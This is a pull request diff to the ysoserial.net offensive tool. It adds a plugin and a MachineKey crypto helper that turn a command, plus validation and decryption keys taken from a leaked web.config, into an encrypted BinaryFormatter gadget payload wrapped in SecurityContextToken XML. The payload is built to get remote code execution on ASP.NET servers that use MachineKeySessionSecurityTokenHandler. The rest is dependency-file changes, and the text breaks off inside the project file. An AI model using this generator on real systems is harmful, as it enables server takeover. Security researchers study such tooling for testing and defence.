### PR TITLE
add MachineKeySessionSecurityTokenHandlerPlugin

### DIFF
--- a/ysoserial/Helpers/MachineKeyHelper.cs
+++ b/ysoserial/Helpers/MachineKeyHelper.cs
@@ -1,0 +1,374 @@
+﻿using System;
+using System.IO;
+using System.Runtime.CompilerServices;
+using System.Security.Cryptography;
+using System.Text;
+using System.Collections.Generic;
+using System.Linq;
+
+namespace ysoserial.Helpers
+{
+    public static class MachineKeyHelper
+    {
+        // From the https://github.com/dmarlow/AspNetTicketBridge/ project to simplify encryption/decryption when it comes to machine keys
+
+        /// <summary>
+        /// Utility class for handling MachineKey Protect/Unprotect.
+        /// </summary>
+        public static class MachineKey
+        {
+            private static readonly UTF8Encoding SecureUTF8Encoding = new UTF8Encoding(encoderShouldEmitUTF8Identifier: false, throwOnInvalidBytes: true);
+
+            /// <summary>
+            /// Protect some data with the specified params.
+            /// </summary>
+            /// <param name="clearData"></param>
+            /// <param name="validationKey"></param>
+            /// <param name="decryptionKey"></param>
+            /// <param name="decryptionAlgorithmName"></param>
+            /// <param name="validationAlgorithmName"></param>
+            /// <param name="primaryPurpose"></param>
+            /// <param name="specificPurposes"></param>
+            /// <returns></returns>
+            public static byte[] Protect(byte[] clearData, string validationKey, string decryptionKey, string decryptionAlgorithmName, string validationAlgorithmName, string primaryPurpose, params string[] specificPurposes)
+            {
+                // The entire operation is wrapped in a 'checked' block because any overflows should be treated as failures.
+                checked
+                {
+
+                    // These SymmetricAlgorithm instances are single-use; we wrap it in a 'using' block.
+                    using (SymmetricAlgorithm encryptionAlgorithm = CryptoConfig.CreateFromName(decryptionAlgorithmName) as SymmetricAlgorithm)
+                    {
+                        // Initialize the algorithm with the specified key and an appropriate IV
+                        encryptionAlgorithm.Key = SP800_108.DeriveKey(HexToBinary(decryptionKey), primaryPurpose, specificPurposes);
+
+
+                        // If the caller didn't ask for a predictable IV, just let the algorithm itself choose one. 
+                        encryptionAlgorithm.GenerateIV();
+                        // IV retrieval
+                        byte[] iv = encryptionAlgorithm.IV;
+
+                        using (MemoryStream memStream = new MemoryStream())
+                        {
+                            memStream.Write(iv, 0, iv.Length);
+
+                            // At this point:
+                            // memStream := IV
+
+                            // Write the encrypted payload to the memory stream.
+                            using (ICryptoTransform encryptor = encryptionAlgorithm.CreateEncryptor())
+                            {
+                                using (CryptoStream cryptoStream = new CryptoStream(memStream, encryptor, CryptoStreamMode.Write))
+                                {
+                                    cryptoStream.Write(clearData, 0, clearData.Length);
+                                    cryptoStream.FlushFinalBlock();
+
+                                    // At this point:
+                                    // memStream := IV || Enc(Kenc, IV, clearData)
+
+                                    // These KeyedHashAlgorithm instances are single-use; we wrap it in a 'using' block.
+                                    using (HashAlgorithm signingAlgorithm = CryptoConfig.CreateFromName(validationAlgorithmName) as HashAlgorithm)
+                                    {
+                                        // Initialize the algorithm with the specified key if it's KeyedHashAlgorithm
+                                        if (signingAlgorithm is KeyedHashAlgorithm keydSigningAlgorithm)
+                                        {
+                                            keydSigningAlgorithm.Key = SP800_108.DeriveKey(HexToBinary(validationKey), primaryPurpose, specificPurposes);
+                                        }
+
+                                        // Compute the signature
+                                        byte[] signature = signingAlgorithm.ComputeHash(memStream.GetBuffer(), 0, (int)memStream.Length);
+
+                                        // At this point:
+                                        // memStream := IV || Enc(Kenc, IV, clearData)
+                                        // signature := Sign(Kval, IV || Enc(Kenc, IV, clearData))
+
+                                        // Append the signature to the encrypted payload
+                                        memStream.Write(signature, 0, signature.Length);
+
+                                        // At this point:
+                                        // memStream := IV || Enc(Kenc, IV, clearData) || Sign(Kval, IV || Enc(Kenc, IV, clearData))
+
+                                        // Algorithm complete
+                                        byte[] protectedData = memStream.ToArray();
+                                        return protectedData;
+                                    }
+                                }
+                            }
+                        }
+                    }
+                }
+            }
+
+            /// <summary>
+            /// Unprotect some data with the specified params.
+            /// </summary>
+            /// <param name="protectedData"></param>
+            /// <param name="validationKey"></param>
+            /// <param name="decryptionKey"></param>
+            /// <param name="decryptionAlgorithmName"></param>
+            /// <param name="validationAlgorithmName"></param>
+            /// <param name="primaryPurpose"></param>
+            /// <param name="specificPurposes"></param>
+            /// <returns></returns>
+            public static byte[] Unprotect(byte[] protectedData, string validationKey, string decryptionKey, string decryptionAlgorithmName, string validationAlgorithmName, string primaryPurpose, params string[] specificPurposes)
+            {
+                // The entire operation is wrapped in a 'checked' block because any overflows should be treated as failures.
+                checked
+                {
+                    using (SymmetricAlgorithm decryptionAlgorithm = CryptoConfig.CreateFromName(decryptionAlgorithmName) as SymmetricAlgorithm)
+                    {
+                        decryptionAlgorithm.Key = SP800_108.DeriveKey(HexToBinary(decryptionKey), primaryPurpose, specificPurposes);
+
+                        // These KeyedHashAlgorithm instances are single-use; we wrap it in a 'using' block.
+                        using (HashAlgorithm validationAlgorithm = CryptoConfig.CreateFromName(validationAlgorithmName) as HashAlgorithm)
+                        {
+                            if (validationAlgorithm is KeyedHashAlgorithm keydValidationAlgorithm)
+                            {
+                                keydValidationAlgorithm.Key = SP800_108.DeriveKey(HexToBinary(validationKey), primaryPurpose, specificPurposes);
+                            }
+
+                            int ivByteCount = decryptionAlgorithm.BlockSize / 8;
+                            int signatureByteCount = validationAlgorithm.HashSize / 8;
+                            int encryptedPayloadByteCount = protectedData.Length - ivByteCount - signatureByteCount;
+                            if (encryptedPayloadByteCount <= 0)
+                            {
+                                return null;
+                            }
+
+                            byte[] computedSignature = validationAlgorithm.ComputeHash(protectedData, 0, ivByteCount + encryptedPayloadByteCount);
+
+                            if (!BuffersAreEqual(
+                                buffer1: protectedData, buffer1Offset: ivByteCount + encryptedPayloadByteCount, buffer1Count: signatureByteCount,
+                                buffer2: computedSignature, buffer2Offset: 0, buffer2Count: computedSignature.Length))
+                            {
+
+                                return null;
+                            }
+
+                            byte[] iv = new byte[ivByteCount];
+                            Buffer.BlockCopy(protectedData, 0, iv, 0, iv.Length);
+                            decryptionAlgorithm.IV = iv;
+
+                            using (MemoryStream memStream = new MemoryStream())
+                            {
+                                using (ICryptoTransform decryptor = decryptionAlgorithm.CreateDecryptor())
+                                {
+                                    using (CryptoStream cryptoStream = new CryptoStream(memStream, decryptor, CryptoStreamMode.Write))
+                                    {
+                                        cryptoStream.Write(protectedData, ivByteCount, encryptedPayloadByteCount);
+                                        cryptoStream.FlushFinalBlock();
+
+                                        byte[] clearData = memStream.ToArray();
+
+                                        return clearData;
+                                    }
+                                }
+                            }
+                        }
+                    }
+                }
+            }
+
+            [MethodImpl(MethodImplOptions.NoOptimization)]
+            private static bool BuffersAreEqual(byte[] buffer1, int buffer1Offset, int buffer1Count, byte[] buffer2, int buffer2Offset, int buffer2Count)
+            {
+                bool success = (buffer1Count == buffer2Count); // can't possibly be successful if the buffers are of different lengths
+                for (int i = 0; i < buffer1Count; i++)
+                {
+                    success &= (buffer1[buffer1Offset + i] == buffer2[buffer2Offset + (i % buffer2Count)]);
+                }
+                return success;
+            }
+
+            private static class SP800_108
+            {
+                public static byte[] DeriveKey(byte[] keyDerivationKey, string primaryPurpose, params string[] specificPurposes)
+                {
+                    using (HMACSHA512 hmac = new HMACSHA512(keyDerivationKey))
+                    {
+
+                        GetKeyDerivationParameters(out byte[] label, out byte[] context, primaryPurpose, specificPurposes);
+
+                        byte[] derivedKey = DeriveKeyImpl(hmac, label, context, keyDerivationKey.Length * 8);
+
+                        return derivedKey;
+                    }
+                }
+
+                private static byte[] DeriveKeyImpl(HMAC hmac, byte[] label, byte[] context, int keyLengthInBits)
+                {
+                    checked
+                    {
+                        int labelLength = (label != null) ? label.Length : 0;
+                        int contextLength = (context != null) ? context.Length : 0;
+                        byte[] buffer = new byte[4 /* [i]_2 */ + labelLength /* label */ + 1 /* 0x00 */ + contextLength /* context */ + 4 /* [L]_2 */];
+
+                        if (labelLength != 0)
+                        {
+                            Buffer.BlockCopy(label, 0, buffer, 4, labelLength); // the 4 accounts for the [i]_2 length
+                        }
+                        if (contextLength != 0)
+                        {
+                            Buffer.BlockCopy(context, 0, buffer, 5 + labelLength, contextLength); // the '5 +' accounts for the [i]_2 length, the label, and the 0x00 byte
+                        }
+                        WriteUInt32ToByteArrayBigEndian((uint)keyLengthInBits, buffer, 5 + labelLength + contextLength); // the '5 +' accounts for the [i]_2 length, the label, the 0x00 byte, and the context
+
+                        int numBytesWritten = 0;
+                        int numBytesRemaining = keyLengthInBits / 8;
+                        byte[] output = new byte[numBytesRemaining];
+
+                        for (uint i = 1; numBytesRemaining > 0; i++)
+                        {
+                            WriteUInt32ToByteArrayBigEndian(i, buffer, 0); // set the first 32 bits of the buffer to be the current iteration value
+                            byte[] K_i = hmac.ComputeHash(buffer);
+
+                            // copy the leftmost bits of K_i into the output buffer
+                            int numBytesToCopy = Math.Min(numBytesRemaining, K_i.Length);
+                            Buffer.BlockCopy(K_i, 0, output, numBytesWritten, numBytesToCopy);
+                            numBytesWritten += numBytesToCopy;
+                            numBytesRemaining -= numBytesToCopy;
+                        }
+
+                        // finished
+                        return output;
+                    }
+                }
+
+                private static void WriteUInt32ToByteArrayBigEndian(uint value, byte[] buffer, int offset)
+                {
+                    buffer[offset + 0] = (byte)(value >> 24);
+                    buffer[offset + 1] = (byte)(value >> 16);
+                    buffer[offset + 2] = (byte)(value >> 8);
+                    buffer[offset + 3] = (byte)(value);
+                }
+
+            }
+
+            private static void GetKeyDerivationParameters(out byte[] label, out byte[] context, string primaryPurpose, params string[] specificPurposes)
+            {
+                label = SecureUTF8Encoding.GetBytes(primaryPurpose);
+
+                using (MemoryStream stream = new MemoryStream())
+                using (BinaryWriter writer = new BinaryWriter(stream, SecureUTF8Encoding))
+                {
+                    foreach (string specificPurpose in specificPurposes)
+                    {
+                        writer.Write(specificPurpose);
+                    }
+                    context = stream.ToArray();
+                }
+            }
+
+            private static byte[] HexToBinary(string data)
+            {
+                if (data == null || data.Length % 2 != 0)
+                {
+                    // input string length is not evenly divisible by 2
+                    return null;
+                }
+
+                byte[] binary = new byte[data.Length / 2];
+
+                for (int i = 0; i < binary.Length; i++)
+                {
+                    int highNibble = HexToInt(data[2 * i]);
+                    int lowNibble = HexToInt(data[2 * i + 1]);
+
+                    if (highNibble == -1 || lowNibble == -1)
+                    {
+                        return null; // bad hex data
+                    }
+                    binary[i] = (byte)((highNibble << 4) | lowNibble);
+                }
+
+                int HexToInt(char h)
+                {
+                    return (h >= '0' && h <= '9') ? h - '0' :
+                    (h >= 'a' && h <= 'f') ? h - 'a' + 10 :
+                    (h >= 'A' && h <= 'F') ? h - 'A' + 10 :
+                    -1;
+                }
+                return binary;
+            }
+        }
+
+
+        /// <summary>
+        /// IDataProtector implementation that uses a provided machine key purposes
+        /// to protect / unprotect data via the MachineKey Utility Class.
+        /// </summary>
+        public class MachineKeyDataProtector
+        {
+            private const string PrimaryPurpose = "User.MachineKey.Protect";
+            private readonly string _validationKey;
+            private readonly string _decryptionKey;
+            private readonly string _decryptionAlgorithm;
+            private readonly string _validationAlgorithm;
+            private readonly string[] _purposes;
+
+            /// <summary>
+            /// 
+            /// </summary>
+            public static readonly string[] DefaultCookiePurposes =
+            {
+            "Microsoft.Owin.Security.Cookies.CookieAuthenticationMiddleware",
+            "Cookies",
+            "v1"
+        };
+
+            /// <summary>
+            /// Constructor - Be sure to set purposes here, or use the ForPurposes method.
+            /// </summary>
+            /// <param name="validationKey">MachineKey validation key</param>
+            /// <param name="decryptionKey">MachineKey decryption key</param>
+            /// <param name="decryptionAlgorithm">Decryption Algorithm - Default AES</param>
+            /// <param name="validationAlgorithm">Validation Algorithm - Default HMACSHA1</param>
+            /// <param name="purposes"></param>
+            public MachineKeyDataProtector(
+                string validationKey,
+                string decryptionKey,
+                string decryptionAlgorithm = "AES",
+                string validationAlgorithm = "HMACSHA1",
+                IEnumerable<string> purposes = null)
+            {
+                _validationKey = validationKey;
+                _decryptionKey = decryptionKey;
+                _decryptionAlgorithm = decryptionAlgorithm;
+                _validationAlgorithm = validationAlgorithm;
+                _purposes = purposes?.ToArray() ?? new string[0];
+            }
+
+            /// <summary>
+            /// Protect some data with the machine key provided.
+            /// </summary>
+            /// <param name="plaintext"></param>
+            /// <returns></returns>
+            public byte[] Protect(byte[] plaintext)
+            {
+                return MachineKey.Protect(plaintext,
+                    _validationKey,
+                    _decryptionKey,
+                    _decryptionAlgorithm,
+                    _validationAlgorithm,
+                    PrimaryPurpose,
+                    _purposes);
+            }
+
+            /// <summary>
+            /// Unprotect some data with the machine key provided.
+            /// </summary>
+            /// <param name="protectedData"></param>
+            /// <returns></returns>
+            public byte[] Unprotect(byte[] protectedData)
+            {
+                return MachineKey.Unprotect(protectedData,
+                    _validationKey,
+                    _decryptionKey,
+                    _decryptionAlgorithm,
+                    _validationAlgorithm,
+                    PrimaryPurpose,
+                    _purposes);
+            }
+        }
+    }
+}

--- a/ysoserial/Plugins/MachineKeySessionSecurityTokenHandlerPlugin.cs
+++ b/ysoserial/Plugins/MachineKeySessionSecurityTokenHandlerPlugin.cs
@@ -1,0 +1,146 @@
+﻿using System.Collections.Generic;
+using NDesk.Options;
+using System;
+using ysoserial.Generators;
+using System.IdentityModel;
+using System.IO;
+using System.Xml;
+using System.IdentityModel.Tokens;
+using ysoserial.Helpers;
+using System.IdentityModel.Services.Tokens;
+using AspNetTicketBridge;
+
+/**
+ * Author: L@2uR1te (@2308652512)
+ * 
+  * Comments: 
+ *  This plugin is based on the existing SessionSecurityTokenHandler plugin.
+ *  See `MachineKeySessionSecurityTokenHandler`: https://learn.microsoft.com/zh-cn/dotnet/api/system.identitymodel.services.tokens.machinekeysessionsecuritytokenhandler?view=netframework-4.8.1 
+ *  This PoC uses BinaryFormatter from TypeConfuseDelegate
+ *  The Ysoserial.net tool includes an exploit plugin for the SessionSecurityTokenHandler security issue. However, due to the fact that SessionSecurityTokenHandler employs DPAPI for encryption and decryption, it is often difficult to exploit in most cases.
+ *  Nevertheless, Microsoft's documentation on SessionSecurityTokenHandler mentions that for web scenarios requiring a similar security mechanism, one can use the MachineKeySessionSecurityTokenHandler.
+ *  This class inherits from SessionSecurityTokenHandler and shares similar characteristics. The key difference is that MachineKeySessionSecurityTokenHandler utilizes MachineKey configuration information for encryption and decryption operations.
+ *  Therefore, as long as the MachineKey configuration information can be obtained (for instance, through a web.config leak), it may be possible to exploit it, making it more susceptible to exploitation compared to SessionSecurityTokenHandler.
+ *  This PoC produces an error and may crash the application
+**/
+
+namespace ysoserial.Plugins
+{
+    public class MachineKeySessionSecurityTokenHandlerPlugin : IPlugin
+    {
+        static string command = "";
+        static bool test = false;
+        static bool minify = false;
+        static bool useSimpleType = true;
+        static string validationKey = "";
+        static string decryptionKey = "";
+        static string validationAlg = "HMACSHA1";
+        static string decryptionAlg = "AES";
+        static string[] purposes = { "System.IdentityModel.Services.MachineKeyTransform" };
+
+        static OptionSet options = new OptionSet()
+            {
+                {"c|command=", "the command to be executed e.g. \"cmd /c calc\"", v => command = v },
+                {"t|test", "In this scenario, the test mode should not be applied, as the sink point relies on the web environment. Default: false", v => test =  v != null },
+                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
+                {"ust|usesimpletype", "This is to remove additional info only when minifying and FormatterAssemblyStyle=Simple. Default: true", v => useSimpleType =  v != null },
+                {"vk|validationKey=", "Enter the validationKey from the web.config", v => validationKey = v },
+                {"ek|decryptionKey=", "Enter the decryptionKey from the web.config", v => decryptionKey = v },
+                {"va|validationAlg=", "Enter the validation from the web.config. Default: HMACSHA1. e.g: HMACSHA1/HMACSHA256/HMACSHA384/HMACSHA512", v => validationAlg = v },
+                {"da|decryptionAlg=", "Enter the validation from the web.config. Default: AES. e.g: AES/DES/3DES", v => decryptionAlg = v }
+            };
+
+        public string Name()
+        {
+            return "MachineKeySessionSecurityTokenHandler";
+        }
+
+        public string Description()
+        {
+            return "Generates XML payload for the MachineKeySessionSecurityTokenHandler class";
+        }
+
+        public string Credit()
+        {
+            return "L@2uR1te";
+        }
+
+        public OptionSet Options()
+        {
+            return options;
+        }
+
+        public object Run(string[] args)
+        {
+            InputArgs inputArgs = new InputArgs();
+            List<string> extra;
+            try
+            {
+                extra = options.Parse(args);
+                inputArgs.Cmd = command;
+                inputArgs.Minify = minify;
+                inputArgs.UseSimpleType = useSimpleType;
+                inputArgs.Test = test;
+            }
+            catch (OptionException e)
+            {
+                Console.Write("ysoserial: ");
+                Console.WriteLine(e.Message);
+                Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
+                System.Environment.Exit(-1);
+            }
+
+            string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
+	<Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
+		urn:unique-id:securitycontext:1
+	</Identifier>
+	<Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie>
+</SecurityContextToken>";
+
+            if (minify)
+            {
+                payload = XmlHelper.Minify(payload, null, null);
+            }
+
+            if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
+            {
+                Console.Write("ysoserial: ");
+                Console.WriteLine("Incorrect plugin mode/arguments combination");
+                Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
+                System.Environment.Exit(-1);
+            }
+
+            byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
+            DeflateCookieTransform myDeflateCookieTransform = new DeflateCookieTransform();
+            MachineKeyDataProtector Protector = new MachineKeyDataProtector(validationKey, decryptionKey, decryptionAlg, validationAlg, purposes);
+            byte[] deflateEncoded = myDeflateCookieTransform.Encode(serializedData);
+            byte[] encryptedEncoded = Protector.Protect(deflateEncoded);
+            payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));
+
+
+            if (minify)
+            {
+                payload = XmlHelper.Minify(payload, null, null);
+            }
+
+            if (test)
+            {
+                // PoC on how it works in practice
+                try
+                {
+                    //In this scenario, the test mode should not be applied, as the sink point relies on the web environment.
+                    //Please run the following code in a web environment configured with a MachineKey for experimentation.
+                    XmlReader tokenXML = XmlReader.Create(new StringReader(payload));
+                    MachineKeySessionSecurityTokenHandler myMachineKeySessionSecurityTokenHandler = new MachineKeySessionSecurityTokenHandler();
+                    myMachineKeySessionSecurityTokenHandler.ReadToken(tokenXML);
+                }
+                catch (Exception err)
+                {
+                    Debugging.ShowErrors(inputArgs, err);
+                }
+            }
+
+            return payload;
+        }
+    }
+}

--- a/ysoserial/packages.config
+++ b/ysoserial/packages.config
@@ -1,5 +1,6 @@
 ﻿<?xml version="1.0" encoding="utf-8"?>
 <packages>
+  <package id="AspNetTicketBridge" version="1.6.0" targetFramework="net472" />
   <package id="fastJSON" version="2.1.27" targetFramework="net452" />
   <package id="FSharp.Core" version="3.1.2.5" targetFramework="net452" />
   <package id="FsPickler" version="4.6" targetFramework="net452" />
@@ -7,9 +8,33 @@
   <package id="FsPickler.Json" version="4.6" targetFramework="net452" />
   <package id="MessagePack" version="2.5.94" targetFramework="net472" />
   <package id="MessagePack.Annotations" version="2.5.94" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.Authentication" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.Authentication.Abstractions" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.Authentication.Core" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.Cryptography.Internal" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.DataProtection" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.DataProtection.Abstractions" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.Hosting.Abstractions" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.Hosting.Server.Abstractions" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.Http" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.Http.Abstractions" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.Http.Extensions" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.Http.Features" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.AspNetCore.WebUtilities" version="2.0.0" targetFramework="net472" />
   <package id="Microsoft.Bcl.AsyncInterfaces" version="6.0.0" targetFramework="net472" />
+  <package id="Microsoft.Extensions.Configuration.Abstractions" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.Extensions.DependencyInjection.Abstractions" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.Extensions.FileProviders.Abstractions" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.Extensions.Hosting.Abstractions" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.Extensions.Logging.Abstractions" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.Extensions.ObjectPool" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.Extensions.Options" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.Extensions.Primitives" version="2.0.0" targetFramework="net472" />
+  <package id="Microsoft.Extensions.WebEncoders" version="2.0.0" targetFramework="net472" />
   <package id="Microsoft.IdentityModel" version="7.0.0" targetFramework="net452" />
+  <package id="Microsoft.Net.Http.Headers" version="2.0.0" targetFramework="net472" />
   <package id="Microsoft.NET.StringTools" version="17.4.0" targetFramework="net472" />
+  <package id="Microsoft.Win32.Registry" version="4.4.0" targetFramework="net472" />
   <package id="NDesk.Options" version="0.2.1" targetFramework="net452" />
   <package id="Newtonsoft.Json" version="12.0.3" targetFramework="net452" />
   <package id="SharpSerializer" version="3.0.1" targetFramework="net452" />
@@ -20,6 +45,10 @@
   <package id="System.Reflection.Emit" version="4.7.0" targetFramework="net472" />
   <package id="System.Reflection.Emit.Lightweight" version="4.7.0" targetFramework="net472" />
   <package id="System.Runtime.CompilerServices.Unsafe" version="6.0.0" targetFramework="net472" />
+  <package id="System.Security.AccessControl" version="4.4.0" targetFramework="net472" />
+  <package id="System.Security.Cryptography.Xml" version="4.4.0" targetFramework="net472" />
+  <package id="System.Security.Principal.Windows" version="4.4.0" targetFramework="net472" />
+  <package id="System.Text.Encodings.Web" version="4.4.0" targetFramework="net472" />
   <package id="System.Threading.Tasks.Extensions" version="4.5.4" targetFramework="net472" />
   <package id="YamlDotNet" version="4.3.2" targetFramework="net452" />
 </packages>

--- a/ysoserial/packages.config
+++ b/ysoserial/packages.config
@@ -1,6 +1,5 @@
 ﻿<?xml version="1.0" encoding="utf-8"?>
 <packages>
-  <package id="AspNetTicketBridge" version="1.6.0" targetFramework="net472" />
   <package id="fastJSON" version="2.1.27" targetFramework="net452" />
   <package id="FSharp.Core" version="3.1.2.5" targetFramework="net452" />
   <package id="FsPickler" version="4.6" targetFramework="net452" />
@@ -8,34 +7,10 @@
   <package id="FsPickler.Json" version="4.6" targetFramework="net452" />
   <package id="MessagePack" version="2.5.94" targetFramework="net472" />
   <package id="MessagePack.Annotations" version="2.5.94" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.Authentication" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.Authentication.Abstractions" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.Authentication.Core" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.Cryptography.Internal" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.DataProtection" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.DataProtection.Abstractions" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.Hosting.Abstractions" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.Hosting.Server.Abstractions" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.Http" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.Http.Abstractions" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.Http.Extensions" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.Http.Features" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.AspNetCore.WebUtilities" version="2.0.0" targetFramework="net472" />
   <package id="Microsoft.Bcl.AsyncInterfaces" version="6.0.0" targetFramework="net472" />
-  <package id="Microsoft.Extensions.Configuration.Abstractions" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.Extensions.DependencyInjection.Abstractions" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.Extensions.FileProviders.Abstractions" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.Extensions.Hosting.Abstractions" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.Extensions.Logging.Abstractions" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.Extensions.ObjectPool" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.Extensions.Options" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.Extensions.Primitives" version="2.0.0" targetFramework="net472" />
-  <package id="Microsoft.Extensions.WebEncoders" version="2.0.0" targetFramework="net472" />
   <package id="Microsoft.IdentityModel" version="7.0.0" targetFramework="net452" />
-  <package id="Microsoft.Net.Http.Headers" version="2.0.0" targetFramework="net472" />
   <package id="Microsoft.NET.StringTools" version="17.4.0" targetFramework="net472" />
-  <package id="Microsoft.Win32.Registry" version="4.4.0" targetFramework="net472" />
-  <package id="NDesk.Options" version="0.2.1" targetFramework="net452" />
+  <package id="NDesk.Options" version="0.2.1" targetFramework="net472" />
   <package id="Newtonsoft.Json" version="12.0.3" targetFramework="net452" />
   <package id="SharpSerializer" version="3.0.1" targetFramework="net452" />
   <package id="System.Buffers" version="4.5.1" targetFramework="net472" />
@@ -45,10 +20,6 @@
   <package id="System.Reflection.Emit" version="4.7.0" targetFramework="net472" />
   <package id="System.Reflection.Emit.Lightweight" version="4.7.0" targetFramework="net472" />
   <package id="System.Runtime.CompilerServices.Unsafe" version="6.0.0" targetFramework="net472" />
-  <package id="System.Security.AccessControl" version="4.4.0" targetFramework="net472" />
-  <package id="System.Security.Cryptography.Xml" version="4.4.0" targetFramework="net472" />
-  <package id="System.Security.Principal.Windows" version="4.4.0" targetFramework="net472" />
-  <package id="System.Text.Encodings.Web" version="4.4.0" targetFramework="net472" />
   <package id="System.Threading.Tasks.Extensions" version="4.5.4" targetFramework="net472" />
   <package id="YamlDotNet" version="4.3.2" targetFramework="net452" />
 </packages>

--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -91,9 +91,6 @@
     <Prefer32Bit>true</Prefer32Bit>
   </PropertyGroup>
   <ItemGroup>
-    <Reference Include="AspNetTicketBridge, Version=1.6.0.0, Culture=neutral, processorArchitecture=MSIL">
-      <HintPath>..\packages\AspNetTicketBridge.1.6.0\lib\netstandard2.0\AspNetTicketBridge.dll</HintPath>
-    </Reference>
     <Reference Include="fastjson, Version=2.1.0.0, Culture=neutral, PublicKeyToken=6b75a806b86095cd, processorArchitecture=MSIL">
       <HintPath>..\packages\fastJSON.2.1.27\lib\net40\fastjson.dll</HintPath>
       <Private>True</Private>
@@ -120,91 +117,18 @@
     <Reference Include="MessagePack.Annotations, Version=2.5.0.0, Culture=neutral, PublicKeyToken=b4a0369545f0a1be, processorArchitecture=MSIL">
       <HintPath>..\packages\MessagePack.Annotations.2.5.94\lib\netstandard2.0\MessagePack.Annotations.dll</HintPath>
     </Reference>
-    <Reference Include="Microsoft.AspNetCore.Authentication, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.AspNetCore.Authentication.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Authentication.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.AspNetCore.Authentication.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.AspNetCore.Authentication.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Authentication.Abstractions.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.AspNetCore.Authentication.Core, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.AspNetCore.Authentication.Core.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Authentication.Core.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.AspNetCore.Cryptography.Internal, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.AspNetCore.Cryptography.Internal.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.Cryptography.Internal.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.AspNetCore.DataProtection, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.AspNetCore.DataProtection.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.DataProtection.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.AspNetCore.DataProtection.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
-      <HintPath>..\packages\Microsoft.AspNetCore.DataProtection.Abstractions.2.0.0\lib\netstandard2.0\Microsoft.AspNetCore.DataProtection.Abstractions.dll</HintPath>
-    </Reference>
-    <Reference Include="Microsoft.AspNetCore.Hosting.Abstractions, Version=2.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60, processorArchitecture=MSIL">
